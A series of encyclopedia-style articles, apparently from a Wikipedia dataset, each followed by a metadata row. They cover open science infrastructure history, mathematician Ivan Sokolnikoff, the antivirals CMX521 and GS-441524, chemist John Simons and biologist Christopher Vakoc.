In 2015 Principles for Open Scholarly Infrastructure have laid out an influential prescriptive definition of open science infrastructures. Subsequent definitions and terminologies of open science infrastructures have been largely elaborated on this basis. The text has also influenced the definition of open science infrastructure retained by the UNESCO in November 2021.
The Principles attempt to hybridize the framework of infrastructure studies with the analysis of the commons initiated by Elinor Ostrom. The principles develop a series of recommendations in three critical areas to the success of open infrastructures:
Governance: the governance of the infrastructure should be open and accountable to the scientific communities it aims to serve. Specific measures should ensure that the management of the organization is transparent and diverse.
Sutainability: the core activities of organization should be covered by recurring funds. Short-term subventions should be limited to short-term projects. Whil the organization could charge for services, it should not extend to the data that should remain "a community property".
Insurance: the technical infrastructure and the output of the organization are open. This ensure that the infrastructure can be recreated if necessary (in the jargon of open source, it becomes "forkable").
The text ends by mentioning several potential consequences of the principles. The authors advocate for a responsible centralization, that embodies a different than the large web commercial platforms like Google and Facebook while still maintaining the important benefit of centralized infrastructures: "we will be able to build accountable and trusted organisations that manage this centralization responsibly". Existing examples of large open infrastructure include ORCID, the Wikimedia Foundation or CERN.
A more critical reception has focused on the underlying political philosophy of the Principles. While the scientific community is a key part of the governance of open science infrastructure, Samuel Moore underline that it is never precisely defined, which raised potential issues of under-representation of minority groups:
History
Early developments (1950–1990)
Scientific projects have been among the earliest use case for digital infrastructure. The theorization of scientific knowledge infrastructure even predates the development of computing technologies. The knowledge network envisioned by Paul Otlet or Vannevar Bush already incorporated numerous features of online scientific infrastructures.
After the Second World War, the United States faced a "periodical crisis": existing journals could not keep up with the rapidly increasing scientific output. The issue became politically relevant after the successful launch of Sputnik: "The Sputnik crisis turned the librarians’ problem of bibliographic control into a national information crisis." The emerging computing technologies were immediately considered as a potential solution to make a larger amount of scientific output readable and searchable. Access to foreign language publication was also a key issue that was expected to be solved by machine translation: in the 1950s, a significant amount of scientific publications were not available in English, especially the one coming from the Soviet block.
Influent members of the National Science Foundation like Joshua Ledeberg advocated for the creation of a "centralized information system", SCITEL that would at first coexist with printed journals and gradually replace them altogether on account of its efficiency. In the plan laid out by Ledeberg to Eugen Garfield in November 1961, the deposit would index as much as 1,000,000 scientific articles per year. Beyond full-text searching, the infrastructure would also ensure the indexation of citation and other metadata, as well as the automated translation of foreign language articles.
Although it anticipates key features of online scientific platforms, the SCITEL plan was technically irrealistic at the time. The first working prototype on an online retrieval system developed in 1963 by Doug Engelhart and Charles Bourne at the Stanford Research Institute was heavily constrained by memory issues: no more than 10,000 words of a few documents could be indexed.
Instead of a general purpose publishing platform, the early scientific computing infrastructures focused on specific research areas, such as MEDLINE for medicine, NASA/RECON for space engineering or OCLC Worldcat for library search: "most of the earliest online retrieval system provided access to a bibliographic database and the rest used a file containing another sort of information—encyclopedia articles, inventory data, or chemical compounds." This early development of scientific computing affected a large variety of disciplines and communities, including the social sciences: "The 1960s and 1970s saw the establishment of over a dozen services and professional associations to coordinate quantitative data collection". Yet these infrastructures were mostly invisible to researchers, as most of the research was done by professional librarians. Not only were the search operating systems complicated to use, but the search has to be performed very efficiently given the prohibitive cost of long-distance telecommunication. To become technically feasible, scientific infrastructure could never be open and became fundamentally hidden to their end users:
The development of digital infrastructure for scientific publication was largely undertaken by private companies. In 1963, Eugene Garfield created the Institute for Scientific Information that aimed to transform the projects initially envisioned with Lederberg into a profitable business. The Science Citation Index relied on a computational processing of citation data. It had a massive and lasting influence on the structuration of global scientific publication in the last decades of the 20th century, as its most important metrics, the Journal Impact Factor, "ultimately came to provide the metric tool needed to structure a competitive market among journal. Garfield also successfully launched Current Contents, a periodic compilation of scientific abstracts that acted as a simplified commercial version of the central deposit envisioned within SCITEL. Rather than being replaced by a centralized information system, leading scientific publishers have been able to develop their own information infrastructure that ultimately reinforced their business position. By the end of the 1960s, the dutch publisher Elsevier and the german publisher Springer have started to computarize their internal data, as well as the management of the journal reviews.
Until the advent of the web, the landscape of scientific infrastructures remained fragmented. Projects, and communities relied on their own unconnected networks at a national or institutional level: "the Internet was nearly invisible in Europe because people there were pursuing a separate set of network protocols". The birthing place of the World Wide Web, the CERN, had its own version of Internet, CERN-Net and also supported its own protocol for e-mail exchange. The European Space Agency used its own iteration of the RECON system also used by NASA engineers (ESRO/RECON). The insulated scientific infrastructures could hardly be connected before the advent of the web. Communication between scientific infrastructures was not only challenging across space, but also across time. Whenever a communication protocol was no longer maintained, the data and knowledge it disseminated was likely to disappear as well: "the relationship between historical research and computing has been durably affected by aborted projects, data loss and unrecoverable formats".
The Web Revolution (1990–1995)
The World Wide Web was originally framed as an open scientific infrastructure. The project was inspired by ENQUIRE, an information management software commissioned to Tim Berners-Lee by the CERN for the specific needs of high energy physics. The structure of ENQUIRE was closer to an internal web of data: it connected "nodes" that "could refer to a person, a software module, etc. and that could be interlined with various relations such as made, include, describes and so forth". While it "facilitated some random linkage between information" Enquire was not able to "facilitate the collaboration that was desired for in the international high-energy physics research community". Like any significant computing scientific infrastructure before the 1990s, the development of ENQUIRE was ultimately impeded by the lack of interoperability and the complexity of managing network communications: "although Enquire provided a way to link documents and databases, and hypertext provided a common format in which to display them, there was still the problem of getting different computers with different operating systems to communicate with each other".
Sharing of data and data documentation was a major focus in the initial communication of the World Wide Web when the project was first unveiled in August 1991 : "The WWW project was started to allow high energy physicists to share data, news, and documentation. We are very interested in spreading the web to other areas, and having gateway servers for other data".
The web rapidly superseded pre-existing online infrastructure, even when they included more advanced computing features. From 1991 to 1994, users of the Worm Community System, a major biology database on worms, switched to the Web and Gopher. While the Web did not include many advanced functions for data retrieval and collaboration, it was easily accessible. Conversely, the Worm Community System could only be browsed on specific terminals shared across scientific institutions: "To take on board the custom-designed, powerful WCS (with its convenient interface) is to suffer inconvenience at the intersection of work habits, computer use, and lab resources (…) The World-Wide Web, on the other hand, can be accessed from a broad variety of terminals and connections, and Internet computer support is readily available at most academic institutions and through relatively inexpensive commercial services."
The Web and similar protocols developed at the time have had a similar impact on scientific publications. Early forms of open access publishing were not developed by large scale institutional infrastructures but through small initiatives. Universal access, regardless of the operating system, made it possible to maintain and share community-driven electronic journals year before online commercial scientific publishings became viable:
The first open-access repositories were individual or community initiatives as well. In August 1991, Paul Ginsparg created the first inception of the arXiv project at the Los Alamos National Laboratory in answer to recurring storage issue of academic mailboxes on account of the increasing sharing of scientific articles.
Building scientific infrastructures for the web (1995-2015)
The development of the World-Wide Web had rendered numerous pre-existing scientific infrastructure obsolete. It also lifted numerous restrictions and obstacles to online contribution and network management that made it possible to attempt more ambitious project. By the end of the 1990s, the creation of public scientific computing infrastructure became a major policy issue. The first wave of web-based scientific projects in the 1990s and the early 2000s revealed critical issues of sustainability. As funding was allocated on a specific time period, critical databases, online tools or publishing platforms could hardly be maintained; and project managers were faced with a valley of death "between grant funding and ongoing operational funding".
Several competing terms appeared to fill this need. In the United States, the cyber-infrastructure was used in a scientific context by a US National Science Foundation (NSF) blue-ribbon committee in 2003: "The newer term cyberinfrastructure refers to infrastructure based upon distributed computer, information and communication technology. If infrastructure is required for an industrial economy, then we could say that cyberinfrastructure is required for a knowledge economy." E-infrastructure or e-science were used in a similar meaning in the United Kingdom and European countries.
Thanks to "sizable investments", major national and international infrastructures have been incepted from the initial policy discussion in the early 2000s to the economic crisis of 2007–2008, such as the Open Science Grid, BioGRID, the JISC, or the Project Bamboo. Specialized free software for scientific publishing like Open Journal Systems became available after 2000. This development entailed a significant expansion of non-commercial open access journals by facilitating the creation and the administration of journal website and the digital conversion of existing journals. Among the non-commercial journals registered to the Directory of Open Access Journals, the number of annual creation has gone from 100 by the end of the 1990s to 800 around 2010, and not evolved significantly since then.
By 2010, infrastructure are "no longer in infancy" and yet "they are also not yet fully mature". While the development of the web solved a large range of technical issues regarding network management, building scientific infrastructure remained challenging. Governance, communication across all involved stakeholders, and strategical divergences were major factors of success or failure. One of the first major infrastructure for the humanities and the social science, the Project Bamboo was ultimately unable to achieve its ambitious aims: "From the early planning workshops to the Mellon Foundation’s rejection of the project’s final proposal attempt, Bamboo was dogged by its reluctance and/or inability to concretely define itself". This lack of clarity was further aggravated by recurring communication missteps between the project initiators and the community it aimed to serve. "The community had spoken and made it clear that continuing to emphasize Service-oriented architecture would alienate the very members of the community Bamboo was intended to benefit most: the scholars themselves". Budgets cuts following the economic crisis of 2007-2008 underlined the fragility of ambitious infrastructure plans relying on a significant recurring funds.
Leading commercial publishers were initially distanced by the unexpected rise of the Web for academic publication: the executive board of Elsevier "had failed to grasp the significance of electronic publishing altogether, and therefore the deadly danger that it posed—the danger, namely, that scientists would be able to manage without the journal". The persistence of high revenues from subscription and the consolidation of the sector made it possible to fund the conversion of the pre-existing online services to the web as well as the digitization of past collections. By the 2010s, leading publishers have been "moving from a content-provision to a data analytics business" and developed or acquired new key infrastructures for the management scientific and pedagogic activities: "Elsevier has acquired and launched products that extend its influence and its ownership of the infrastructure to all stages of the academic knowledge production process". Since it has expanded beyond publishing, the vertical integration of privately owned infrastructures has become extensively integrated to daily research activities.
Toward open science infrastructures (2015-…)
The consolidation and expansion of commercial scientific infrastructure had entailed renewed calls to secure "community-controlled infrastructure". The acquisition of the open repositories Digital Commons and SSRN by Elsevier has highlighted the lack of reliability of critical scientific infrastructure for open science. The SPARC report on European Infrastructures underlines that "a number of important infrastructures at risk and as a consequence, the products and services that comprise open infrastructure are increasingly being tempted by buyout offers from large commercial enterprises. This threat affects both not-for-profit open infrastructure as well as closed, and is evidenced by the buyout in recent years of commonly relied on tools and platforms such as SSRN, bepress, Mendeley, and Github."
In contrast with the consolidation of privately owned infrastructure, the open science movement "has tended to overlook the importance of social structures and systemic constraints in the design of new forms of knowledge infrastructures". It remained mostly focused to the content of scientific research, with little integration of technical tools and few large community initiatives. "Common pool of resources is not governed or managed by the current scholarly commons initiative. There is no dedicated hard infrastructure and though there may be a nascent community, there is no formal membership."
More precise concepts were needed to embed ethical principles of openness, community-service and autonomous governance in the building of infrastructure and ensure the transformation of small localized scholarly networks into large, "community-wide" structures. In 2013, Cameron Neylon underlined that the lack of common infrastructure was one of the main weakness of the open science ecosystem: "in a world where it can be cheaper to re-do an analysis than to store the data, we need to consider seriously the social, physical, and material infrastructure that might support the sharing of the material outputs of research". Two years later, Neylon, Geoffrey Bilder and Jenifer Lin defined a series of Principles for Open Scholarly Infrastructure that reacted primarily to the discrepancy between the increasing openness of scientific publications or datasets and the closeness of the infrastructure that control their circulation.
Since 2015 these principles have become the most influential definition of Open Science Infrastructures and been endorsed by leading infrastructures such as Crossref, OpenCitations or Data Dryad and has become a common basis for the institutional evaluation of existing open infrastructures. The main focus of the Principles is to build "trustworthy institutions" with significant commitments in terms of governance, financial sustainability and technical efficiency sot that it can be durably relied on by scientific communities.
By 2021, public services and infrastructures for research have largely endorsed open science as an integral part of their activity and identity: "open science is the dominant discourse to which new online services for research refer." According to the 2021 Roadmap of the (ESFRI), major legacy infrastructures in Europe have embraced open science principles. "Most of the Research Infrastructures on the ESFRI Roadmap are at the forefront of Open Science movement and make important contributions to the digital transformation by transforming the whole research process according to the Open Science paradigm." Examples of extensive data sharing programs include the European Social Survey (in social science), ECRIN ERIC (for clinical data) or the Cherenkov Telescope Array (in Astronomy).
In agreement with the original intent of the Principles, open science infrastructure are "seen as an antidote to the increased market concentration observed in the scholarly communication space." In November 2021, the UNESCO Recommendation for Open Science acknowledged open science infrastructure as one of the four pillar of open science, along with open science knowledge, open engagement of societal actors and open dialog with other knowledge system and called for sustained investment and funding: "open science infrastructures are often the result of community-building efforts, which are crucial for their longterm sustainability and therefore should be not-for-profit and guarantee permanent and unrestricted access to all public to the largest extent possible."
The development of open scientific infrastructure has become a debated topic regarding the future of online scientific research. In January 2021, a collective of researchers called for a Plan I or Plan Infrastructure in reaction to perceived shortcomings of the international initiative for open science of the cOAlition S, the Plan S. In contrast with the focus of Plan S on scientific publication, Plan I aims to integrate all research outputs on large interoperable infrastructures: "research and scholarship are crucially dependent on an information infrastructure that treats all scholarly output, text, data and code, equally and that is based on open standards and open markets."
Organization of open infrastructures
Most of the landscape reports on Open Infrastructure have been undertaken in Europe and, to a lesser extent, in Latin America. For Europe, the main sources include the SPARC report from 2020, the OPERAS report on social science and humanities infrastructure, as well as the 2019 report of Katherine Skinner (that also extends to a few North American infrastructures). International studies include European Commission 2010 report on The Role of E-Infrastructure which mostly receive input from Europe, South America and North America.
These reports underline that important open science infrastructures may be already existing and yet remain invisible to funders and scientific policies: "alternative practices and projects exist inside and outside Europe, but these projects are almost invisible to the eyes of the public authorities".
Type and roles
Open Access repositories are the most frequent form of Open Science Infrastructure with 5,791 repositories in existence in December 2021 according to OpenDOAR
Yet, there is a significant diversification of the roles and the activities of open science infrastructure, at least among the largest infrastructures. In the survey of European infrastructure conducted by SPARC Europe, 95% of the respondents mention that they provide services in at least three different stages of research production out of six (Creation, Evaluation, Publishing, Hosting, Discovering and Archiving). Agregation, hosting and indexing are especially central activities, common to most Open Science Infrastructures regardless of their focus.
Specialization does happen at a higher level. A network analysis identifies "two main clusters of activities":
Publishing-focused infrastructures which are associated with the "publishing and hosting traditional text formats". Among them, "paper submission (41 out of 70) and review (30) were the most commonly reported activities".
Creation-focused infrastructures which deal preferably with the "processing and storing research outputs, particularly data". Theses actors provide specific services in the field of "data gathering (47 out of 71), and data analysis (40)". Besides, "computation and machine learning (18) and Experimentation (15) were roughly half as common".
Standards and technologies
Standardization is a major function of open science infrastructure as they aim to insure that the content they share and support is distributed consistently as well as ease reuse.
Maintaining open standards is one of the main challenge identified by leading European open infrastructures, as it implies choosing among competing standards in some case, as well as ensuring that the standards are correctly updated and accessibile through APIs or other endpoints. Two third of the respondents have undertaken an evaluation of their technological environment during the past year, to ensure that key components have not become obsolete. As a consequence of this sustained efforts, most open infrastructure complies with the new established standards of open science, such as FAIR data or Plan S.
Open science infrastructures preferably integrate standards from other open science infrastructures. Among European infrastructures: "The most commonly cited systems – and thus essential infrastructure for many – are ORCID, Crossref, DOAJ, BASE, OpenAIRE, Altmetric, and Datacite, most of which are not-for-profit". Google Scholar is the first mentioned commercial service, while Scopus, the leading proprietary academic search engine developed by Elsevier, is one of least quoted leading service. Open science infrastructure are then part of an emerging "truly interoperable Open Science commons" that hold the premise of "researcher-centric, low-cost, innovative, and interoperable tools for research, superior to the present, largely closed system."
Infrastructures are frequently dependent on choices made by external stakeholders, especially scientific publishers: they "do not themselves decide on
the openness of content since they are dependent on the policies of content providers". This affects not only the content but also the "user data policies [that] are set by publishers which limits what can be made available".
Open Science Infrastructure have strong ties with the open source movement. 82% of the European infrastructures surveyed by SPARC claim to have partially built open source software and 53% have their entire technological infrastructure in open source.
Governance
Governance has been self-identified as a potential weakness by the European infrastructure surveyed by SPARC. Less than half of the respondents considering that they are at a "mature" stage in this regard and a "good governance" is quoted as the main challenge. Interaction between the communities they aim to support and the other stakeholders and funders is especially complicated: "One specific challenge identified was the tension between serving the needs of the community of users versus prioritising the needs of clients that provide financial support to the OSI".
The tension between centralization and diversity largely characterizes Open Science Infrastructure. While historically defined as a "centralized [Open Access] project", Redalyc aims to become a "community-based sustainable infrastructure in Latin America" (Berrecil). The leading European open infrastructures have reported "challenges around ensuring sufficient (and sufficiently diverse) representation" as well as the involvement from some professional communities like researchers and librarians.
Audience
Open Science Infrastructure "target and serve a wide range of stakeholders". Researchers remain the primary target, but libraries, teachers and learners are among the expected audience of more than half of the infrastructure surveyed by Sparc Europe.
A majority of European infrastructures "operate at a global scale", with English being the primary language of 82% of the respondents. These infrastructures are also frequently multilingual and integrate a specific national focus: they "provide access to a range of language content of local and international significance".
Open Science Infrastructures benefit to diverse disciplines and scientific communities. In 2020, 72% of the European infrastructures surveyed by Sparc Europe claim to support all disciplines. The social sciences and the humanities are the most mentioned disciplines, which is partly attributed to the fact that the survey was "distributed widely by the OPERAS network". In 2010, the infrastructures supporting the social sciences and the humanities were much less prevalent and most of the uses cases came from "biosciences, High Energy Physics and other fields of physics, earth and environmental sciences, computer science, astronomy and astrophysics".
Economics
Many Open Science Infrastructure run "at a relatively low cost" as small infrastructures are an important part of the open science ecosystem. In 2020, 21 out of 53 surveyed European infrastructures "report spending less than €50,000". Consequently, more than 75% of surveyed European infrastructures are run by small teams of 5 FTEs or less. The size of the infrastructure and the extent of its funding is far from always proportional to the critical service it offers: "some of the most heavily used services make ends meet with a tiny core team of two to five people." Volunteer contributions are significant as well with is both "a strength and weakness to an OSI’s sustainability". The landscape of open science infrastructures is therefore rather close to the ideals of a "decentralised network of small projects" envisioned by theoricians of the scholarly commons. A very large majority of open science infrastructure are non-commercial and collaborations or financial support from the private sector remain very limited.
Overall, European infrastructures were financially sustainable in 2020 which contrasts with the situation ten years prior: in 2010, European infrastructures had much less visibility: they usually lacked "a long-term perspective" and struggled "with securing the funding for more than 5 years". In 2020, European infrastructures frequently relies on grants from National funds and from the European Commission. Without theses grants, most of theses actors would "could only remain viable for less than a year". Yet, one quarter of surveyed European infrastructures was not supported by any grants and subventions and used either alternative means of incomes or voluntary contributions. As they can be "difficult to define adequately", open science infrastructures can be overlooked by funding bodies, which "contributes to the challenge of securing funding".
References
Bibliography
Definitions
Report
Book & thesis
Article
Conference
Other resources
Open science
Open access (publishing)
Data publishing | Open Science Infrastructure | [
"Technology"
] | 7,039 | [
"Data",
"Data publishing"
] |
63,829,771 | https://en.wikipedia.org/wiki/Ivan%20S.%20Sokolnikoff | Ivan Stephan Sokolnikoff (1901, Chernigov Province, Russian Empire – 16 April 1976, Santa Monica) was a Russian-American applied mathematician, who specialized in elasticity theory and wrote several mathematical textbooks for engineers and physicists.
Biography
Born to a wealthy family in Tsarist Russia, Ivan Sokolnikoff was educated by private tutors and at Anders Classical Gymnasium in Kiev. During the Russian Revolution, as a Tsarist naval officer, he was wounded in combat off the Kuril Islands. With the victory of the Reds, he became a refugee in China. There he worked for a subsidiary of an American electrical firm until 1922 when he became an American immigrant in Seattle. In 1922 he matriculated at the University of Idaho and graduated there with an electrical engineering degree in 1926. In 1930 he received his doctorate in mathematics from the University of Wisconsin-Madison. His doctoral dissertation On a Solution of Laplace's Equation with an Application to the Torsion Problem for a Polygon with Reentrant Angles was written under the supervision of Herman William March. In June 1931 Sokolnikoff married Elizabeth Thatcher Stafford. During the years from 1931 to 1941, they wrote 5 significant papers together, as well as the classic textbook Higher Mathematics for Physicists and Engineers. He joined the mathematics department of the University of Wisconsin–Madison as an instructor in 1927 and was promoted to full professor in 1941. At Wisconsin he was a member of the mathematics faculty until 1944.
During WW II Sokolnikoff lived in New York and Washington and did research on ship gun fire-control for the National Defense Research Council. While Sokolnikoff was on the East Coast, Elizabeth Stafford Sokolnikoff taught mathematics and remained in Madison, Wisconsin. Along with mathematical professors William LeRoy Hart (1892–1984) of the University of Minnesota and William Thomas Reid (1907–1977) of the University of Chicago, he organized a pre-meteorology program in which a number of academic institutions trained meteorologists for the U.S. armed forces. In 1946 he became a mathematics professor at the University of California at Los Angeles (UCLA). There he retired as professor emeritus in 1965. In 1947 he divorced his first wife and married Ruth Lawyer in December of that year.
Sokolnikoff was twice a visiting professor at Brown University. He was also twice a Guggenheim Fellow. His Guggenheim Fellowship for the academic year 1952-1953 was spent partly at the Royal Holloway College, London University and partly at the Free University of Brussels. His Guggenheim Fellowship for the academic year 1959–1960 was spent at the Swiss Federal Institute of Technology in Zürich. For the academic year 1962–1963 he held a Fulbright lecturing fellowship at Ankara's Middle East Technical University.
Upon his death he was survived by his widow and a daughter from his second marriage.
Selected publications
Articles
Books
with Elizabeth Stafford Sokolnikoff: Higher Mathematics for Engineers and Physicists , McGraw Hill, 1934, 2nd edition 1941
Advanced Calculus , McGraw Hill 1939
The Mathematical Theory of Elasticity , McGraw Hill, 1946, 2nd edition 1956
Tensor Analysis - theory and applications to geometry and mechanics of continua , Wiley 1951, 2nd edition 1964
with Raymond Redheffer: Mathematics of physics and modern engineering, McGraw Hill 1958, 2nd edition 1966
References
20th-century American mathematicians
20th-century Russian mathematicians
Applied mathematicians
Russian emigrants to the United States
University of Idaho alumni
University of Wisconsin–Madison College of Letters and Science alumni
University of Wisconsin–Madison faculty
University of California, Los Angeles faculty
1901 births
1976 deaths | Ivan S. Sokolnikoff | [
"Mathematics"
] | 720 | [
"Applied mathematics",
"Applied mathematicians"
] |
63,830,786 | https://en.wikipedia.org/wiki/CMX521 | CMX521 is an antiviral drug discovered by Chimerix, which was developed for the treatment of norovirus, though it also shows efficacy against related viral diarrheas such as rotovirus and some sapoviruses, astroviruses and adenoviruses. It is a nucleoside analogue which acts as an inhibitor of viral RNA-dependant RNA polymerase.
See also
GS-441524
NITD008
Sangivamycin
References
Anti–RNA virus drugs
Antiviral drugs | CMX521 | [
"Biology"
] | 111 | [
"Antiviral drugs",
"Biocides"
] |
63,831,346 | https://en.wikipedia.org/wiki/John%20Simons%20%28chemist%29 | John Philip Simons (born 20 April 1934) is a British physical chemist known for his research in photochemistry and photophysics, molecular reaction dynamics and the spectroscopy of biological molecules. He was professor of physical chemistry at the University of Nottingham (1981–93) and Dr. Lee's Professor of Chemistry at the University of Oxford (1993–99).
Education
Simons studied at the University of Cambridge, graduating in 1955. His PhD is from Cambridge, under the supervision of Ronald George Wreyford Norrish.
Career
Simons first worked at the University of Birmingham, successively holding positions as an ICI Fellow (1960), lecturer (1961–67), reader (from 1975) and professor of photochemistry from 1979. In 1981 he became professor of physical chemistry at the University of Nottingham. In 1993 he was appointed Dr. Lee's Professor of Chemistry at the University of Oxford and fellow of Exeter College. He retired in 1999.
Research
Simons' initial research at the University of Birmingham investigated the dynamics of molecular photodisassociation. The development of a high-speed rotor by Philip Burton Moon at Birmingham allowed Simons to apply this apparatus with crossed molecular beams at supersonic speed to examining the dynamics of photochemical reactions and bimolecular collisions. At Nottingham, he started to use tuneable lasers to investigate reaction dynamics. He was a pioneer of the use of Doppler-resolved, polarised laser spectroscopy to generate three-dimensional images of molecules colliding (stereodynamics), and is regarded as "one of the founding fathers in the field of 'stereodynamics'".
His later research at Oxford used infrared and ultraviolet laser spectroscopy and quantum chemical calculations to investigate the three-dimensional structure and interactions of carbohydrates, peptides, neurotransmitters and other small biomolecules in the absence of environmental noise.
Awards and honours
Simons was elected Fellow of the Royal Society of Chemistry in 1979, and served as honorary secretary and president of the society's Faraday Division (1993–95). He became a Fellow of the Royal Society in 1989, and served on the society's Council (1999–2000). He gave the Royal Society's Humphry Davy Lecture (2001) and received the society's Davy Medal in 2007. Other awards include the Royal Society of Chemistry's Tilden Prize (1982–3), Chemical Dynamics Award (1993), Polanyi Medal (1996), Spiers Memorial Award (1999) and Liversidge Award (2007). He held a visiting Miller Professorship at the University of California, Berkeley.
In 2002 he received an honorary doctorate (DSc) from the University of Birmingham. In 2005, a special edition of the journal Molecular Physics was published to honour Simons' seventieth birthday, the previous year.
Publications
Photochemistry and Spectroscopy (Wiley-Interscience; 1971) ()
References
External links
John Simons | Royal Society
Chemistry Tree
1934 births
20th-century English chemists
Academics of the University of Birmingham
Academics of the University of Nottingham
Academics of the University of Oxford
Dr Lee's Professors of Chemistry
British physical chemists
Spectroscopists
Fellows of the Royal Society
Fellows of the Royal Society of Chemistry
Living people | John Simons (chemist) | [
"Physics",
"Chemistry"
] | 669 | [
"Physical chemists",
"Spectrum (physical sciences)",
"Analytical chemists",
"Spectroscopists",
"Spectroscopy"
] |
63,832,050 | https://en.wikipedia.org/wiki/Christopher%20Vakoc | Christopher Vakoc is a molecular biologist and a professor at Cold Spring Harbor Laboratory.
Education
Vakoc graduated with a degree in Biochemistry from Pennsylvania State University in 2001. He then attained his M.D. and his Ph.D. from the University of Pennsylvania. His PhD research was performed with Gerd Blobel on the regulation of gene expression during hematopoiesis. In 2008, he established his own independent research group at Cold Spring Harbor Laboratory.
Career and research
Vakoc uses CRISPR/Cas9 technology to probe the epigenetic regulation of cancer and to identify new cancer drug targets. In 2011, Vakoc discovered that the epigenetic protein BRD4 was particularly important for leukemia, leading to a series of clinical trials with a new drug, JQ1. By studying cancer epigenetics, Vakoc has also identified a new subtype of lung cancer and has discovered how gene expression changes affect metastasis in pancreatic cancer. and lives with his 2 children lucas and marcus vakoc
Recently, Vakoc has developed a CRISPR screening approach to identify the protein domains that are most important for cancer growth.
Awards and honors
American Association for Cancer Research Outstanding Achievement Award, 2015
Pershing Square Sohn Cancer Research Alliance Prize, 2016
Paul Marks Prize for Cancer Research, 2019
References
Living people
Molecular biologists
Eberly College of Science alumni
University of Pennsylvania alumni
Year of birth missing (living people) | Christopher Vakoc | [
"Chemistry"
] | 296 | [
"Biochemists",
"Molecular biology",
"Molecular biologists"
] |
63,832,281 | https://en.wikipedia.org/wiki/GS-441524 | GS-441524 is a nucleoside analogue antiviral drug which was developed by Gilead Sciences. It is the main plasma metabolite of the antiviral prodrug remdesivir, and has a half-life of around 24 hours in human patients. Remdesivir and GS-441524 were both found to be effective in vitro against feline coronavirus strains responsible for feline infectious peritonitis (FIP), a lethal systemic disease affecting domestic cats. Remdesivir was never tested in cats (though some vets now offer it), but GS-441524 has been found to be effective treatment for FIP.
It is widely used despite no official FDA approval due to Gilead's refusal to license this drug for veterinary use. In several countries oral GS-441524 tablets (and injectable remdesivir) became legally available to vets for the treatment of FIP in cats, for example Australia, the Netherlands, and the United Kingdom.
Besides remdesivir, other prodrugs include obeldesivir (Gilead Sciences, Phase III) and deuremidevir (Vigonvita/Junshi, conditional approval in China).
Use and research
Feline infectious peritonitis
Since untreated feline infectious peritonitis (FIP) is fatal in almost all cases and in most countries there are no approved treatments available, GS-441524 has reportedly been sold illegally worldwide on the black market and used by pet owners to treat affected cats, although Gilead Sciences has refused to license the drug for veterinary use. Its efficacy for this purpose has been conclusively demonstrated in multiple trials, including field trials, and even in more complicated forms of FIP such as those with multisystemic or neurological involvement. In naturally infected cats, a recovery rate of over 80% has been observed with GS-441524 treatment in several studies and in treatment programs in countries where the drug is legalised.
As of 2023, oral GS-441524 tablets or capsules (and injectable remdesivir) became legally available to vets for the treatment of FIP in cats in Australia, the Netherlands, and the United Kingdom.
COVID-19
GS-441524 is either similar to or more potent than remdesivir against SARS-CoV-2 in cell culture, with some researchers arguing that GS-441524 would be better than remdesivir for the treatment of COVID-19. Specific advantages cited include ease of synthesis, lower kidney and hepatotoxicity, as well as potential for oral delivery (which is precluded of remdesivir because of poor hepatic stability and first pass metabolism). The public health advocacy group, Public Citizen, in an open letter urged the DHHS and Gilead to investigate GS-441524 for the treatment of COVID-19, suggesting that Gilead was not doing so for financial motives related to the longer intellectual property lifespan of Remdesivir, whose patents expire no sooner than 2035. Direct efficacy against SARS-CoV-2 was demonstrated in a mouse model of COVID-19.
GS-441524 has been directly administered in a healthy human, with highest plasma concentrations of 12 uM reached, which is >10 times the concentration required for activity against SARS-CoV-2 in culture.
USA regulations
GS-441524 is sold as a research chemical in very high purity (>99% by NMR and HPLC) by a number of suppliers. Such sales for research purposes do not constitute patent infringements which was affirmed by a U.S. Supreme Court decision. However, despite the high purity, under FDA regulations, such chemicals are not allowed for clinical trials since their manufacture is not performed under FDA cGMP certified conditions.
Deuremidevir
A deuterium modified version of GS-441524 has been produced and has shown pre-clinical efficacy in both cell culture and mouse models by a team including members of Wuhan Institute of Virology. A subsidiary of Shanghai Junshi Biosciences received conditional approval for VV116, now named deuremidevir, to treat adults with COVID-19 from China's National Medical Products Administration on January 30, 2023.
Pharmacology
Pharmacodynamics
GS-441524 nucleoside is phosphorylated by nucleoside kinases (probably adenosine kinase (ADK), which is the enzyme that phosphorylates the structurally similar ribavirin), and then phosphorylated again by nucleoside-diphosphate kinase (NDK) to the active nucleotide triphosphate form. The triphosphate of GS-441524, GS-443902, is also the bioactive anti-viral agent generated by remdesivir, but is generated by a different biochemical mechanism from the later.
Pharmacokinetics
GS-441524 is a 1'-cyano-substituted adenosine analogue. It is remdesivir's predominant metabolite circulating in the serum due to rapid hydrolysis (half life less than 1 hour) followed by dephosphorylation.
In response to the letter from Public Citizen, National Institutes of Health's drug discovery arm, National Center for Advancing Translational Sciences (NCATS), has started systematic Investigational New Drug enabling experiments including pharmacokinetics in multiple pre-clinical species, and also (in October) in humans (results not yet published). Oral bioavailability was found to be excellent in dogs, good in mice, but modest in cynomolgus non-human primates. Prediction of human oral bioavailability from pre-clinical data is more art than science, and relies on modeling data from multiple species. Taking as reference point the clinical and pre-clinical data of other nucleoside analogues, human oral bioavailability of GS-441524 is expected to fall somewhere in between that seen in dog as a high point and that seen in non-human primates. Since GS-441524 has a bit less than half the molecular weight of remdesivir, it will deliver as much active metabolite to the blood as the same dose of remdesivir (for example, 100 mg), even if human oral bioavailability is 50%, comparable to (for example) ribavirin. More recent data releases from NCATS shows that GS-441524 is tolerated at 1000 mg/kg in dogs with a maximum plasma concentration (Cmax) of nearly 100 μM, or about 100-fold higher than the concentrations required for activity against the virus in cell culture.
The elimination half-life of GS-441524 is around 2 hours in cynomolgus, much shorter than the 24 hours reported in humans. The longer half life suggests once-a-day dosing if the drug is approved for human oral use.
Mechanism of action
Intracellular triple-phosphorylation of GS-441524 yields its active 1'-cyano-substituted adenosine triphosphate analogue, which directly disrupts viral RNA replication by competing with endogenous NTPs for incorporation into nascent viral RNA transcripts and triggering delayed chain termination of RNA-dependent RNA polymerase.
Tolerance
In vitro experiments in Crandell Rees feline kidney (CRFK) cells found GS-441524 was nontoxic at 100 μM concentrations, 100 times the dose effective at inhibiting FIPV replication in cultured CRFK cells and infected macrophages. Clinical trials in cats indicate the drug is well-tolerated, with the primary side effect being dermal irritation from the acidity of the injection mix.
Some researchers suggesting its utility as a treatment for COVID-19 have pointed out advantages over remdesivir, including lack of on-target liver toxicity, longer half-life and exposure (AUC) and much cheaper and simpler synthesis.
See also
CMX521
NITD008
Notes
References
Anti–RNA virus drugs
Antiviral drugs
Nitriles
Nucleosides | GS-441524 | [
"Chemistry",
"Biology"
] | 1,725 | [
"Antiviral drugs",
"Nitriles",
